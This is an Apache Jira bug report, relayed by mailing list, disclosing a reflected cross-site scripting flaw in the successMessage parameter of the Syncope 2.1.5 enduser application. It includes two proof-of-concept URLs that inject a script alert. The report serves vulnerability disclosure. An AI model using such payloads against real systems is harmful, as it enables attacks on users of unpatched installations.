[jira] [Created] (SYNCOPE-1516) XSS vulnerability (successmessage field)

songmingxuan (Jira) Mon, 25 Nov 2019 23:44:14 -0800

songmingxuan created SYNCOPE-1516:
-------------------------------------

             Summary: XSS vulnerability (successmessage field)
                 Key: SYNCOPE-1516
                 URL: https://issues.apache.org/jira/browse/SYNCOPE-1516
             Project: Syncope
          Issue Type: Bug
          Components: enduser
    Affects Versions: 2.1.5
         Environment: ubuntu 5.0.0-36-generic #39~18.04.1-ubuntu
(syncope-standalone-2.1.5-distribution.zip)
            Reporter: songmingxuan
         Attachments: syncope_xss.docx


Here's how XSS works and the URL

——————————

http://*.*.*.*:9080/syncope-enduser/app/#!/self?successMessage=<script>alert(11)</script>

http://*.*.*.*:9080/syncope-enduser/?successMessage=<script>alert(11)</script>

——————————

 

See attached documents for details ：syncope_xss.docx

 

 



--
This message was sent by Atlassian Jira
(v8.3.4#803005)

[jira] [Created] (SYNCOPE-1516) XSS vulnerability (successmessage field)

Reply via email to